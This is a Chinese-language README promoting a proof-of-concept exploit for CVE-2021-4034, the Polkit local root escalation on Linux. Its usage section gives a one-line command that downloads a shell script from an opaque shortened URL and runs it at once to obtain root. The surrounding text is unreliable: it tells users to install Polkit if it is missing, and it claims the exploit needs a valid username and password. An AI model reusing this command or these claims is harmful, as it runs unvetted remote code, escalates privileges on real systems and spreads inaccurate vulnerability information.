CVE-2021-4034 PoC
项目简介
CVE-2021-4034 是一个 Linux Polkit(前称为 PolicyKit)本地权限提升漏洞。该漏洞允许非特权用户在系统上以 root 权限执行任意代码。此 PoC(Proof of Concept)是为了演示如何利用此漏洞。
功能与用途
这个 PoC 可用于测试你的系统是否受到 CVE-2021-4034 漏洞的影响。如果你的系统中安装了 Polkit 并且版本受到影响,那么你可以使用这个 PoC 来验证它是否存在漏洞。
请注意,仅限于测试和学习目的。恶意使用此 PoC 可能导致法律后果。
特点
- 易用性 - 本 PoC 只需一行命令即可运行。
- 可定制化 - 用户可以根据自己的需求对 PoC 进行修改。
- 可移植性 - 此 PoC 可以在任何安装有 Polkit 的 Linux 系统上运行。
如何使用
首先,确保你的系统已经安装了 Polkit:
dpkg -s polkit
如果返回 Package polkit is not installed
, 则你需要先安装 Polkit。
然后,下载并运行 PoC:
wget https://git.io/Jtubq -O cve-2021-4034.sh && chmod +x cve-2021-4034.sh && ./cve-2021-4034.sh
如果你的系统受到 CVE-2021-4034 漏洞影响,PoC 将以 root 权限执行 id
命令,并显示 uid=0(root) gid=0(root)
。
请注意,成功利用此漏洞需要在目标机器上具有有效的用户名和密码。如果你没有这些凭据,PoC 不会成功。
结论
CVE-2021-4034 是一个严重的本地权限提升漏洞,可以被恶意用户滥用。通过下载和使用这个 PoC,你可以轻松地检查你的系统是否受到影响。请务必保持 Polkit 和其他软件包更新到最新版本,以保护你的系统安全。
项目链接:https://gitcode.com/arthepsy/CVE-2021-4034
如需获取更多信息,请访问项目的 GitCode 页面。